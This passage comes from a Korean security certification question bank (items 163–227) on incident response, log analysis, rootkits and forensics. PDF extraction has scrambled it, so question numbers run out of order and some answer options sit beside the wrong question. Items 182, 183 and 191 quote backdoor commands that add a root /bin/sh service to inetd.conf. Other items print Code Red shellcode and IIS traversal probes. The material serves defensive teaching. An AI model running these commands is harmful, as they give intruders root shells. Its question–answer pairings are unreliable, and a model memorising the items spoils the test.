4 /var/log/lastlog 163. 유닉스 시스템의 에러로그 메시지의 facility level의 심각성(severity)이 증가하는 순으로 나열 된 것은? 1 info - err - crit - alert - emerg 2 info - err - alert - crit - emerg 3 info -err - crit - emerg - alert 4 err - info - crit - alert - emerg 164. 다음 에러메시지 기능(facility) 레벨(level)의 설명 중 틀린 것은? 1 notice : 비 임계 메시지(non-critical message) 2 crit : 하드 장치 에러와 같은 임계 에러 (critical error) 3 emerg : 시스템 패닉(panic) 4 alert : 문제 추적을 돕는 특수 정보 395
396 165. 침해사고 시 침입자가 변경 또는 손상시킨 파일을 추적하여 파일 권한 추적 및 사용 시간 등을 확인하여 접근시도 및 기타 행위 등에 대해 추적할 수 있다. 특수 권한을 가진 파일을 추적 하는데 사용되는 명령어를 모두 고르면? 1 find 2 ls 3 pwdx 4 pstree 166. 아래는 유닉스 시스템 /var/adm/messages에 있는 로그이다. 설명으로 옳은 것은? May 5 11:57:50 www ipop3d[933]: connect from xxx.xxx May :54 www ipop3d[934]: connect from xxx.xxx ===================================== ================== Jun 11 10:03:07 ns impapd[447]: command stream end of file, while reading line usr=??? host=dialup xxx.xxx.xxx.xxx Jun 05 15:10:40 ns imapd[14943]: Login failure user=^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p ^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p ^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p ^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^ p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p^p host =AAA.AAA.AAA.AAA 1 WWW의 취약성을 이용하여 공격한 것으로 판단된다. 2 AAA.AAA.AAA.AAA에서 imap의 취약성을 이용하여 로컬공격을 한 것으로 판단된다. 3 nmap이 로컬에서 imap/ipop에 대한 취약성 의 여부를 스캔한 것으로 판단된다. 4 pop3의 버퍼 오버프로우의 취약성을 이용 하여 공격한 것으로 판단된다 침해사고 시스템에 대한 분석을 위한 절차 설명에 대한 것이다. 침입자의 흔적과 출발지를 분석하는 명령어에 대한 설명 중 옳지 않은 것 은? 1 who : 사용자 및 사용자의 컴퓨터 확인 2 last : 사용자들의 로그인/로그아웃 일시 기록 확인 3 lastcomm : 사용자들의 시스템 명령 및 프로세스 기록 확인 4 Snmpnetstat : 네트워크 접속 현황 확인 168. 웹서버의 error_log에서 다음과 같은 로그를 발견하였다. 다음 중 올바른 분석은? [error] [client x.x.x.x] File does not exist: /home/testbank/public_html/scripts/root.exe [error] [client x.x.x.x] File does not exist: /home/testbank/public_html/msadc/root.exe [error] [client x.x.x.x] File does not exist: /home/testbank/public_html/c/winnt/system3 2/cmd.exe [error] [client x.x.x.x] File does not exist: /home/testbank/public_html/d/winnt/system3 2/cmd.exe [error] [client x.x.x.x] File does not exist: /home/testbank/public_html/scripts/..%5c../wi nnt/system32/cmd.exe [error] [client x.x.x.x] File does not exist:/home/testbank/public_html/_vti_bin/..% 5c../..%5c../..% 5c../winnt/system32/cmd.exe 1 IIS 웹서버 취약성 공격 2PHP 업로드 취약성 공격 3DNS/BIND 취약성 공격 4 CGI-BIN 권한설정 오류를 이용한 공격 396
397 169. 침해당한 시스템을 점검하는 방법 중 올바 르지 않은 것은? 171. 침해 사고 발생시 일차적으로 취할 조치 사 항 중 잘못된 것은? 1 원하지 않은 프로세스가 없는지, "rpcinfo -p" 를 이용하여 점검한다. 2 cron과 at.으로 수행되는 모든 파일을 검사 한다. 3 inetd.conf 파일과 /etc/services 파일에서 침입자가 추가한 불법 프로그램 서비스가 있는지 점검한다. 4 mount, su 명령이 suid 파일인지 조사한다 다음 messages 로그에 남은 공격시도에 대 한 설명으로 맞는 것은? 00:25: A.B > C.D : S : (0) win 8192(DF) 00:25: A.B > C.D : S : (0) win 8192(DF) 00:25: A.B > C.D : S : (0) win 8192 (DF) 00:25: A.B > C.D : S : (0) win 8192 (DF) 00:25: A.B > C.D : S : (0) win 8192 (DF) 00:25: A.B > C.D : S : (0) win 8192 (DF) 00:25: A.B > C.D : S : (0) win 8192 (DF) 00:25: A.B > C.D : S : (0) win 8192 (DF)...(중략) 1 공격대상시스템에 백도어를 심으려는 시도로 보인다. 2 공격대상시스템에 버퍼 오버플로를 일으키 려는 공격이다. 3 공격시도는 오랜 기간에 걸쳐서 지속되었다. 4 SYN 패킷을 이용한 스텔스 스캔이다. 1 침해 시스템의 네트워크를 분리시킨다. 2 침입차단시스템의 로그를 분석한다. 3 네트워크 장비의 로그를 분석한다. 4 침입탐지 시스템의 접근제어를 설정한다 시스템 침해 사고 발생 후 의심되는 프로그 램을 추적하기 위해 사용되는 도구가 아닌 것은? 1 ptrace 2 par (IRIX) 3 truss (Solaris) 4 top 173. 웹서버의 로그에 아래와 같은 내용이 반복 되어 남은 것을 발견하였다. 아래 로그를 분석한 결과로 맞는 것은? [04/Aug/2001:20:36: ] "GET /default.ida? XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXX XXXXXXXXXXXX%u9090%u6858%ucbd3%u78 01%u9090%u6858%ucbd3%u7801%u9090 %u6858%ucbd3%u7801%u9090%u9090%u81 90%u00c3%u0003%8b00%u531b%u53ff%u00 7 8%u0000%u00=a HTTP/1.0" 시스템 관리자의 IIS 설정 오류로 인한 로그 이다. 2 Code Red 웜에 감염된 시스템에서의 공격 이다. 3 root.exe 파일을 다운로드받아 설치해서 패치 하도록 한다. 4 위의 로그가 다시 발생하지 않게 하려면 tcp 21번 포트 접근제한 설정을 해야 한다. 397
398 174. 침해사고 분석 시, 다음 실행파일들의 공통 점은 무엇인가? - /bin/login - 모든 /usr/etc/in.* files (예: in.telnetd) - /lib/libc.so.* (on Suns). - inetd에서 호출되는 모든 것 - netstat, ps, ls, ifconfig 등 1 침입자의 출발지를 분석하는데 이용된다. 2 침입자의 행동을 모니터링하는데 이용된다. 3 위 파일들을 이용하여 시스템에 새로 추가된 사용자를 찾을 수 있다. 4 침입자의 활동을 감추기 위하여 이용된다 침해사고 시 로그를 분석하여 비인가자의 접근 내역과 수행한 작업 등 여러 가지 상황에 대한 파악을 할 수 있다. 로그 정보에 대한 설명 으로 적절치 않은 것은? 1 원격 접근한 사용자의 접근 내역은 lastlog, wtmp, pacct에 저장된다. 2 시스템 로그에 대한 주기적인 백업을 필요로 한다. 3 주기적인 로그 분석이 요구된다. 4 시스템 로그의 경우 정보는 성공한 명령에 대해서는 로그가 남지 않는다 침해사고를 당한 리눅스 시스템을 분석한 결과, 리눅스 루트킷인 lrk5(linux RootKit 5)가 설치되어 있는 것을 발견했다. 다음 중 대응방법 으로 옳지 않은 것은? 1 /dev/ptyp 파일에서 ps 명령으로부터 숨기고 싶은 프로세스를 지정하므로 해당파일 내용을 점검한다. 2 /dev/ptyq 파일에서 netstat 명령으로부터 숨기고 싶은 특정 IP, 포트번호를 지정하므로 해당파일 내용을 점검한다. 3 먼저 시스템에서 ps 명령을 이용하여 프로세스를 조회한 뒤 의심이 가는 프로세스 를 제거한다. 4 시스템 외부에서 nmap 등 점검 도구를 이용 하여 열린 포트를 검사한다 다음은 침해사고가 의심되는 서버에서 현재 디렉터리 내 정규파일(regular file)을 찾기 위한 명령을 실행시킨 것이다. 아래 명령을 통해 점검 하였을 시 다른 디렉터리 에 비해 정규 파일을 발견하기 어려운 디렉터리는? # find. -type f -print 1 /dev 2 /etc 3 /var/log 4 /var/tmp 178. 침입당한 시스템은 공격자의 흔적을 감춰주 는 다양한 루트킷, 트로이 목마, 백도어프로그램 의 존재 가능성 때문에 모든 프로그램을 다시 설 치하는 것이 좋다.(정확한분석을 한 후 침입방법 을 찾아내지 못하면 지속적인 침입가능성 존재) 아래는 프로그램의 변조를 확인하는 방법이다. 옳지 못한 것은? 1 시스템 프로그램 파일 크기, Timestamp(생성 시간, 변경시간 등) 확인 2 침입차단 시스템을 이용한 확인 3 truss 또는 strace 명령을 이용하여 시스템 콜 추적 4 무결성 검사도구나 OS 벤더에서 제공하는 Checksum 값을 이용 179. MY.NET.COM의 관리자가 TARGET.NET의 관 리자에게 사고통보메일과 함께 아래와 같은 공격 로그를 받았다. MY.NET.COM의 관리자가 사고시 점 즈음에 변경된 파일을 찾고자 할 때 알맞은 명령은? (현재날짜를 Jun 10이라 가정할 때) Jun 4 13:35:39 MY.NET.COM:4880 -> TARGET.NET.1:111 SYN **S***** Jun 4 13:35:39 MY.NET.COM:4881 -> TARGET.NET.2:111 SYN **S***** Jun 4 13:35:39 MY.NET.COM:4882 -> TARGET.NET.3:111 SYN **S*****...(생략) 1 find / -ctime -10 -ls 2 find / -dtime 10 -ls 3 find /dev -type f -ls 4 find / -user root -perm -10 -ls 398
399 180. 아래의 내용을 정확히 분석한 것은? C:\>netstat -na Active Connections Proto Local Address Foreign Address State TCP : :0 LISTENING 중간생략 TCP : :0 LISTENING TCP : :0 LISTENING TCP : :0 LISTENING TCP : :0 LISTENING TCP : :1652 ESTABLISHED UDP :137 *:* 1 정상적으로 운영되는 것으로 보인다. 2 백오리피스 2000이 설치되었고 접속 중으로 의심된다. 3 스텔스 스캔(Stealth Scan)의 일종인 SYN 스캔을 당하고 있다. 4 위의 내용으로는 아무사실을 알 수 없다 아래의 시스템은 5개월 전 8월에 설치한 시 스템이다. 이상한 징후를 보여 아래와 같이 조사 하였다. 설명으로 틀린 것은? [root@ns /etc]# ls -alct /bin more total rw root root 818 Jan 15 06:28.bash_history drwxr-xr-x 2 root root 2048 Jan 15 06:28./ drwxr-xr-x 19 root root 1024 Jan 15 06:00../ -rw-r--r-- 1 root bin 0 Jan 15 06:00 si -rwxr-xr-x 1 root root Jan 15 05:59 ls* -rwxr-xr-x 1 root root Jan 15 05:59 ps* -r-sr-xr-x 1 root root Jan 15 05:59 login* -rwxr-xr-x 1 root root Jan 15 05:59 netstat*... [[email protected]]# strace -e trace=open ls -al open("/etc/ld.so.cache", O_RDONLY) = 3... open("/usr/src/.puta/.1file", O_RDONLY) = 3... [email protected]]# ls -alct total 36 drwxr-xr-x 2 root root 1024 Jan 22 02:55./ -rw-r--r-- 1 root root 0 Jan 22 02:47.1file drwxr-xr-x 5 root root 1024 Jan 15 05:59../ -rw-r--r-- 1 root root 27 Jan 15 05:59.1addr -rw-r--r-- 1 root root 21 Jan 15 05:59.1logz -rw-r--r-- 1 root root 38 Jan 15 05:59.1proc -rwxr-xr-x 1 root root 6948 Jan 15 05:58 t0rns* -rwxr-xr-x 1 root root 7578 Jan 15 05:58 t0rnp* -rwxr-xr-x 1 root root 1345 Jan 15 05:58 t0rnsb* -rw-r--r-- 1 root root Jan 14 23:46 system [root@ns /etc]# telnet localhost Trying Connected to localhost. Escape character is '^]'. SSH ls, ps, netstat 등이 변조된 것으로 추정된다. 2 ls 명령의 시스템 콜을 추적해본 결과.1file 파일을 참고하도록 변조되어 있음을 알 수 있다. 3 SSH의 일반적인 22번 포트(Port) 대신 포트를 이용하여 백도어로 사용하는 것으로 의심된다. 4 ls, ps, netstat 등의 변조된 파일과 백도어 등을 모두 삭제하면 안전하게 시스템을 사용 할 수 있다. 399
400 182. 시스템이 침입자의 공격을 받은 후 /etc/service와 /etc/ientd.conf 파일이 변조되었다. 다음 /etc/inetd.conf 파일에서 침입자가 백도어 를 심어놓은 것으로 의심이 되는 서비스는? #pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d telnet stram tcp nowait root /usr/sbin/tcpd in.telnetd ssh stream tcp nowait root /usr/sbin/tcpd /bin/bash imap stream tcp nowait root /usr/sbin/tcpd imapd finger stream tcp nowait root /usr/sbin/tcpd in.fingerd 1pop-3 2 ssh 3 imap 4 finger 183. 아래 로그는 rpc.statd 취약성 공격을 당한 리눅스 시스템을 보여주고 있다. rpc.statd 취약성 과 관련 로그에 대한 설명으로 옳지 않은 것은? Aug 31 10:43:21 linux18.certcc.or.kr rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E^F ^F^G^G08049f10bffff f84d5f4d e4f bffff <88>F < 89> F+,<89><8D>N<8D>V<80>1<89>@<80>/bi n/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >>/etc/inetd.conf;killall -HUP inetd Jan 22 00:40:27 victim rpc.statd[525]: SM_MON request for hostname containing '/': ^D??D??E?...릱릱릱릱릱릱릱 릱?^뎧쵁?(꺠?컘?.꺠 꺝 껊#?? 픺 뉶'뉶*꺠 뉶쳣F린+, 됹 뛐쵋V맹 1??? 瘟 bin/sh -c echo "9088 stream tcp nowait root /bin/sh -i" >>/tmp/m; /usr/sbin/inetd /tmp/m; Feb 8 19:57:37 victim rpc.statd[524]: gethostbyname error for^x??x??y??y??z??z??[??[?풺 ffff74c804a c f6d616e f f66bffff718 bffff719 bffff71abffff71b릱릱릱릱릱릱릱릱릱릱릱릱릱 릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱 릱릱 릱릱릱릱릱릱릱릱릱릱릱릱릱 1 rpc.statd는 수행되면서 클라이언트 쪽에서 온 format string을 서버내의 syslog()함수에 전달 하는 과정에서 적절한 input validation을 하지 않아 원격지에서 임의의 명령을 실행할 수 있는 것을 말한다. 2 rpc.statd 취약성에 관한 공격 로그 탐지 할 수 있는 방법은 /var/log/messages파일 에서 rpc.statd와 관련된 로그를 점검하는 것 이다. 3 rpc.statd공격은 자동화된 공격도구들의 공격 에 의해 디폴트로 열리는 포트는 9704번 포트 이외에도 2222번 포트, 1524번 포트, 600번 포트 등이 있으므로 항상 이러한 포트가 열려져 있는지 확인해봐야 한다. 4 로그내용으로 보아 rpc.statd는 인터넷 서버 데몬인 inetd 서비스를 죽인다 다음 중 사고 대처 능력(Incident Response Capability)과 가장 관계가 적은 것은 무엇인가? 1 과거의 사고와 대처 행위에 대한 DB Repository를 개발하여 향후 교정 행위를 돕는다. 2 정확한 측정을 수행하고 인식수준을 향상 시키는 것을 도울 수 있도록 사고를 분석 한다. 3 상세운영계획을 개발하여 사고로부터 복구 하기 위한 구체적인 대처행위를 요약한다. 4 중역, 보안 담당, IS요원, 법률 전문가, 대외 관리자 등으로 구성된 징계위원회를 설치하여 답변을 듣는다. 400
401 185. 침해사고 후 개인 홈페이지의 보안 운영에 서 적절치 않은 것은? 1 내부 인가자에 대한 네트워크 자원의 공유 2 홈페이지를 위한 최신 버전의 서버 설치 및 보안 패치 3 로그분석을 통한 침해사고 재발생 방지 4 OS를 포함한 모든 S/W 재설치 후 백업 장비를 활용한 백업 후 서비스 재개 186. 다음은 네트워크 환경을 통한 일반 침입형 태에 대한 설명이다. 다음에 내용이 설명하는 것 은? 인가받지 않은 제 3자가 송신한 데이터를 수 신지까지 가는 도중에 몰래 스니핑을 활 용하여 보거나 도청하는 행위 1 가로채기 2 변조 3 위조 4 차단 188. 인터넷에서는 많은 공격 방법이 존재한다. 아래는 공격방법과 대처 방법을 나열한 것이다. 옳은 것을 모두 고르시오? 1 재전송 공격(Replay Attack) : 메시지에 타임 스탬프 또는 넘버를 포함함으로써 막을 수 있다. 2 중재자 공격(Man-in-the-Middle-Attack) : Diffie-Hellman 알고리즘을 사용해서 공격을 어렵게 할 수 있다. 3 선택된 평문공격(Chosen Plaintext Attack) : 임의의 문자를 메시지에 추가해서 공격을 어렵게 할 수 있다. 4 기밀성은 무결성을 포함하므로 기밀성만을 보장하면 된다 다음은 네트워크 서비스 거부공격으로 인한 접속마비에 대한 현상 및 대응요령을 설명한 것 이다. 다음 중 가장 적합하지 않은 것은? 187. Windows NT 서버가 설치되어 있는 개인 PC에서 인터넷 서비스 서버 시스템에 IIS 시스템 버그를 이용한 해킹 사고가 발생했다. 다음 중 가장 적절한 보안 해결 방법은? 1 IIS에 대한 보안 패치를 수행한다. 2 Microsoft index server를 재설치한다. 3 Internet explorer 버전에 맞는 IIS 취약성 패치 파일을 받아서 시스템을 패치한다. 4 제공하고 있는 웹서버의 ASP로 만들어진 게시판의 퍼미션을 보안상 안전한 설정으로 재구성한다. 1 이상 트래픽에 의한 네트워크 속도 저하나 특정 서비스(http, smtp 등) 다운 시 서비스 거부공격을 의심해본다. 2 서비스 거부공격 시 라우터의 패킷 필터링 기능을 설정하여 대응한다. 3 리눅스 시스템의 경우 iptables를 이용한 패킷 필터링을 설정한다. 4 외부에서 들어오는 패킷의 발신지를 확인하여 공격자에게 역공격을 수행한다 다음은 패킷 캡처 도구인 tcpdump 프로그 램으로 잡은 로그의 일부분이다. 다음 로그에 대 한 설명으로 올바르지 않은 것은 무엇인가? 09:32:43: scan.com.1173 > dns.net.21: S : (0) win : 항목은 TCP 시작 시퀀스 번호로 정상적인 세션 연결은 데이터를 보내지 않는다. 2 win 512 scan.com의 TCP 송신 버퍼 크기(바 이트)이다. 3 dns.net은 목적지 호스트 명이다. 4 S는 TCP 플래그로 TCP연결을 시작하기 위한 SYN 플래그를 나타낸다. 401
402 191. 유닉스 시스템의 rpc.statd는 주로 리부팅 과 관련된 네트워크 상태를 모니터링하기 위해서 RPC 프로토콜로 구현된 RPC 유틸리티로서NFS lock recovery를 수행할 때 NFS filelocking 서비 스에 의해 사용되는 프로그램이다. Rpc.statd는 NFS(Network File System) 아키텍처를 구성하는 하나의 요소이며 거의 대부분의 유닉스(리눅스)시 스템에 구현되어 있다. 다음 중 이러한 rpc.statd 데몬의 취약성에 대한 설명으로 틀린 것은 무엇 인가? 192. 다음은 sulog에 나타날 수 있는 로그 형 태이다. 이 중 비정상적이거나 조사해봐야 할 로 그로 볼 수 있는 것은 어떤 것인가? 1 su 2월 21일 15:38 + pts/1 ksheo-root 2 su 2월 21일 15:39 - pts/1 ksheo-root 3 su 2월 21일 15:40 + pts/1 ksheo-bin 4 su 2월 21일 15:41 + pts/1 oracle-root 아래의 내용은 이러한 공격이 시도되었을 때 생 성되는 로그의 사례이다. 1 위의 로그는 /var/log/messages에 기록된다. 2 이 공격의 영향으로 9704번 포트로 root shell이 열리게 된다. 3 주로 리눅스 시스템에서 취약성이 발견되며 상용 유닉스인 Solaris, AIX와 같은 시스템 에서는 취약성이 발견되지 않는다. 4 NFS를 사용하지 않으면 취약성이 발견되지 않는다 UNIX 시스템에는 다양한 로그정보를 가 진 파일과 관련 명령어들이 있다. 침해 사고 의 흔적이 있거나 시스템의 이상 유무를 파악할 때 이러한 로그는 유용한 정보를 제 공해 준다. 다 음 중 불법적인 사용자가 시스템에 원격 로그인 시도를 했을 경우 로그인 시도에 대해 로그를 남 기는 파일이 아닌 것은 무엇인가? 1 messages 2 secure log 3 utmp, wtmp 4 sulog 402
403 194. 침해사고가 발생한 이후 수정이 의심되는 파일의 c-time(change-time: 파일 변경 시 간)이 동일 디렉터리 내 다른 파일들과 다른지를 확인 하여 파일의 변경 내역을 확인 할 수 있다. c-time 값을 확인할 수 있는 명령어는? 1 ls -aslc more 2 ls -as more 3 ls -al 4 ls -al more 197. 컴퓨터 포렌식스 도구는 전자증거를 확보하 기 위하여 특별히 고안된 컴퓨터 프로그램이나 이를 하드웨어와 결합시킨 장치를 말한다. 전자 증거는 쉽게 변경될 수 있고, 변경되어도 이를 확인할 수 있는 방법이 제한되어 있기 때문에 전 자증거를 수집하거나 보존하는 과정에서 복사도 구와 같은 장비나 프로그램을 사용함으로써 절차 의 객관화와 법정제시의 용이성을 얻을 수 있다. 다음 중 이런 포렌식스 도구들이 갖추어야 할 기 능이 아닌 것은 무엇인가? 195. 시스템 침해사고 분석 과정에서 시스템에 남아 있는 로그를 이용해서 대략적인 공격 시간 대를 알 경우에는 시스템 분석과 조사가 그만큼 쉬워진다. 대부분의 공격시간대 는 시스템이나 보안장비에 남아있는 로그로써 알 수 있는데 유 닉스 시스템에서는 find명령을 이용해서 공격자 가 시스템 파일에 접근하거나 변경했을 당시의 시간을 찾아 낼 수 있는데 다음 중 파일의 MAC time에 대한 속성 중 마지막으로 파일은 읽거나 (Read) 실행(Execution)시킨 시간을 나타내는 속 성은 무엇인가? 1 atime 2 mtime 3 ctime 4 ftime 196. 사이버 범죄가 일어났을 경우 하드디스크나 플로피디스크, CDROM 등 각종 컴퓨터상 정보 처리장치를 분석, 범죄의 법적 증거가 될 만한 자료를 추출, 보관하는 기술과 이를 법정에 제시 할 수 있도록 증거를 확보할 수 있는 기술들을 통칭하는 말로 기존 에 컴퓨터 또는 네트워크를 통해 일어나는 사이버 범죄의 경우, 그 행위가 눈에 보이 지 않는다는 속성 때문에 법적 증거를 제시하는데 한계가 있지만 ( )을 구축하면 사 이 버 범죄에 대한 과학적인 증거를 확보할 수 있어 엄밀 수사가 가능하다. 다음 중 ( )에 들어갈 말 로 적당한 것은? 1 포렌식스시스템 2 침입탐지시스템 3 침입차단시스템 4 ESM 1하드디스크 복사기능 2 암호 crack 기능 3 로그 삭제 기능 4 데이터 검사 기능 198. 다음 중 포렌식스 소프트웨어의 요구조건에 해당 하는 사항인 증거 보존 기능, 증 거 수집 및 분석 기능, 문자열 검색 기능들을 고루 갖추 고 있으며, 미국 법원에서도 이 프로그램을 통한 증거 채택의 예가 있는 윈도우용 포렌식스 프로 그램은 무엇인가? 1 lsof(list open file) 2 LANgaurd 3 TCT(The Coroner's Toolkit) 4 Encase 199. 시스템 침해사고가 의심될 때 수행하는 시 스템 분석 방법 중 격리분석을 통해 분석 을 하 게 될 경우에 해당하는 설명이 아닌 것은 다음 중 무엇인가? 1 대체 백업 시스템이 있거나 분석할 동안 서비스를 하지 않아도 될 경우에 실시할 수 있다. 2 정확한 증거보존이 필요한 경우, 그리고 분석 시스템을 이용하여 아주 철저한 분석을 원할 경우 실시할 수 있다. 3 분석 도중에 침입 흔적이 파괴되거나 손상될 수 있는 위협이 존재한다. 4 격리 이후에는 공격 프로그램 또는 침입자를 모니터링하기가 어렵게 된다. 403
404 200. 다음 중 시스템 침해사고가 의심될 때 수행 하는 시스템 분석 방법의 종류에 해당하지 않는 것은 무엇인가? 1 온라인 분석 2 컴퓨터 포렌식스 시스템을 이용한 분석 3 격리 분석 4 가상 분석 201. 다음 중 웹 사이트 공격자가 자신의 "초기 화면 변조(defacement) 결과"를 보호하기 위해 흔히 사용하는 방법은? 1 홈페이지를 선동적인 그래픽으로 변조함 2 홈페이지 상위 페이지 변조 3 홈 페이지 하위 페이지 변조 4 변조된 페이지의 암호화 5 변조된 페이지에 새로운 패스워드 부 202. 다음 중 웹 사이트에 올리지 말아야 할 정 보의 종류는 무엇인가? 1 서비스 및 요금 청구 정책 2 TV 광고와 같은 마케팅 캠페인 3 회사 연락처 4 개인정보보호 정책 5 고객 개인신상 자료 204. Microsoft 환경을 사용하고 있으며, 프로젝 트 관리 기능을 시점 기반(Time-based) 위험 분 석 프로젝트에 포함시키고자 한다. 다음 중 어떤 도구가 가장 적절한가? 1 Crystal Ball 2 Risk + 3 COBRA 4 CRAMM 205. 다음 중 어떤 시나리오가 조직에 가장 크고 장기적인 손해를 입힐 수 있는가? 1 웹 사이트에 대한 서비스 거부 공격 2 하위 웹페이지에 대한 웹 페이지 변조 3 홈 페이지 변조 4 매스 메일 바이러스 감염 206. 다음 중 특정 침해사고 이슈를 식별하고 억 제하고, 제거하고 복구하기 위한 침해사고 대응 절차를 생성하는 데 사용하기 위한 위험분석 방 법으로써 가장 적절한 것은? FMECA (Failure Mode, Effects and Criticality Analysis) 1 Risk Dynamics 2 Time Based Analysis 3 Monte Carlo 4 CCA (Cause Consequence Analysis) 203. 회사 웹사이트의 홈 페이지 변조 공격을 유 발할 수 있는 사항에 대한 실패 트리(fault tree) 위험 분석을 하고 그런 공격의 재발방지를 위하 여 무엇을 할지를 파악하고자 한다. 그렇게 함에 있어서 다음의 기본 조건을 식별하였다. 다음 중 근본 원인을 결정을 위한 추가적인 분해가 필요 하지 않은 조건은? 207. 일반적인 바이러스/웜 공격은 보안의 어떤 요소를 공격하는가? 1 기밀성 및 무결성 2 가용성 및 기밀성 3 가용성 및 무결성 4 무결성 및 인증 1 제로데이 익스플로잇(exploit) 2 부적절한 접근 통제 3 부적절한 패스워드 4 운영체제 패치적용 실패 208. 다음 중 패스워드 크래킹의 일반적인 단계 가 아닌 것은? 1 적법한 사용자 ID를 찾는다. 2사용된 암호 알고리즘을 찾는다. 3 암호화된 패스워드를 입수한다 개의 가능한 패스워드 목록을 만든다 5 목록의 각 패스워드를 암호화한다. 6 같은 것이 있는 지 확인한다 404
405 209. 다음 중 방화벽을 우회하는 방법으로 맞지 않는 것은? 214. 다음 중 추가 조사가 필요한 침해사고의 징 후가 아닌 것은? 1 메신저사용 2 무선 AP 사용 3 암호화된 이메일 전송 4 P2P 파일 공유 1 사용자 로그온 이벤트 2 침입탐지시스템 경보 3 시스템 재부팅 4 로그파일의 의심스러운 엔트리 210. 다음 중 이벤트가 아닌 침해사고로 간주되 는 것은? 1 인가된 로그임 2 시스템 부팅 절차 3 비인가된 로그인 4 스케줄된 시스템 재부팅 211. 모든 시스템들이 불필요하게 마이크로소프 트의 오피스 매크로가 실행되도록 설정되어 있다 1최소 권한 부여 원칙 위배 2서비스 분리 부재 3 부적절한 보안 의식 4 단일 기종의 위험 212. 봇(bots)을 보다 기술적으로 설명하면 다음 중 무엇인가? 1 쉘 스크립트 2 웹 스파이더 3 분산 에이전트 4 자가 존속 코드 213. 다음 중 추측하기 어려운 패스워드를 선택 하는 방법이 아닌 것은? 1 사전에 나와 있는 단어를 사용하지 말 것 2 복잡한 패턴을 사용하지 말 것 3 이름(자신, 배우자, 아이들, 애완견, 유명인사 등)이나 생일을 사용하지 말 것 4 자신의 이름 또는 어카운트 이름의 변형을 사용하지 말 것 5 전화번호, 자동차 번호판 또는 주민등록 번호 와 같은 정보를 사용하지 말 것 215. 웹사이트의 어떤 부분이 해당 사이트를 호 스팅하고 있는 서버에 대한 정보를 노출하는 데 사용될 수 있는가? 1 html 소스 코드 2 히든 코드 3 데이터베이스 필드 4 히든 필드 216. 다음 중, 웹 페이지를 방문하고 있는 동안에 사용자의 행위를 기록하는 데 사용되지 않는 것 은? 1 쿠키 2 히든 폼 엘리먼트(hidden form elements) 3 페이지 파일 4 세션 추적 217. 다음 중 스테가노그래피의 대체 (substitution) 방법에 대한 설명으로 틀린 것은? 1 파일내의 데이터는 히든 텍스트로 대체될 수 있다 2 대체는 파일을 손상 시킬 수도 있다 3 호스트 파일의 중요하지 않은 데이터를 대체 한다. 4 히든 텍스트는 호스트 파일의 사용되지 않는 영역을 채운다 스테가노그래피를 파괴하기 위해서 가장 좋 은 방법은 무엇인가? 1 히든 정보의 일부를 제거한다. 2 파일 이름을 변경한다. 3 유사 컬러의 수를 제한한다 4 파일 사이즈를 늘린다 405
406 219. 기업 내에서 취약점을 스캐닝 하기 전에 무 엇이 먼저 선행되어야 하나? 223. 다음 중 어떤 것이 대형 기업의 침해사고 대응을 위한 필수사항으로 적합하지 않은가? 1 스니퍼 소프트웨어 2 업무 지침서 사본 3 포트 목록 및 서비스 목록 입수 4 문서화된 경영진의 승인 220. 다음 중 사실이 아닌 것은? 1 내부 사용자가 실수로 핵심 데이터를 삭제 했을 경우, 백업 테이프로부터 복구가 가능 하므로 침해사고로 간주하지 않는다. 2 비인가된 접근, 서비스 거부 공격은 침해 사고로 간주한다. 3 내부 사용자가 실수로 컴퓨터 사용정책을 위반하였을 경우에도 침해사고로 간주한다. 4 천재지변의 경우도 침해사고로 간주한다. 1 시스템관리 기본 절차에 대한 체크리스트 작성 2 침입탐지 시스템의 설치 3 담당직원의 적절한 교육훈련 4 재난복구계획의 갱신 224. 다음 중 침해사고에 관한 설명 중 맞는 것 은? 1 모든 침해사고는 이벤트로 구성된다. 2 비인가된 로그온은 이벤트이나 침해사고는 아니다. 3 모든 이벤트는 침해사고이다. 4 비인가된 로그온은 침해사고로 간주된다. 5 1)항 및 4)항 221. 시스템이 해킹되었는데 네트워크 상에서 분 리할 수 없는 상황이다. 다음 중 어떤 방법이 해 당 시스템을 임시적으로 보호하는 가장 단순하고 효과적인 방법인가? 1 해당 시스템을 허니팟으로 변경하여 공격자를 추적하여 공격을 멈춘다. 2 침입탐지 시스템을 수행하여 공격을 멈춘다. 3 시스템의 IP 주소와 이름을 변경한다. 4 시스템 스케너를 활용 취약점을 찾는다 대형 기업에서 침해사고를 추적하여 보고서 를 정리하기에 가장 적합한 사람은? 1 상위 IT 관리자 2 현장 실무자 3 IT 부서와는 관련이 없으나 상위 경영진 4 침해사고가 발생한 시스템 또는 데이터의 소 유주 225. 다음 중 침해사고가 아닌 것은? 1 다른 사용자 계정의 비인가된 사용 2 시스템 권한의 비인가된 사용 3 데이터를 파괴하는 악성코드의 실행 4 타인에게 자신의 계정을 빌려주는 행위 226. 다음 중 침해사고로 볼 수 있는 것은 무엇 인가? 1 바이러스 감염 2 시스템 부팅 절차 3 시스템 붕괴 4 네트워크내의 패킷의 플러딩(Flooding) 227. 다음 중 스머프(Smurf) 공격에 대한 설명으 로 잘못된 것은? 1 ICMP Echo Request ( Ping ) 패킷을 사용한다 2 브로드캐스팅 주소를 사용한다. 3 소스 주소가 대상 시스템 주소로 위조된다. 4 소스 주소와 대상 시스템 주소와 동일하다. 406
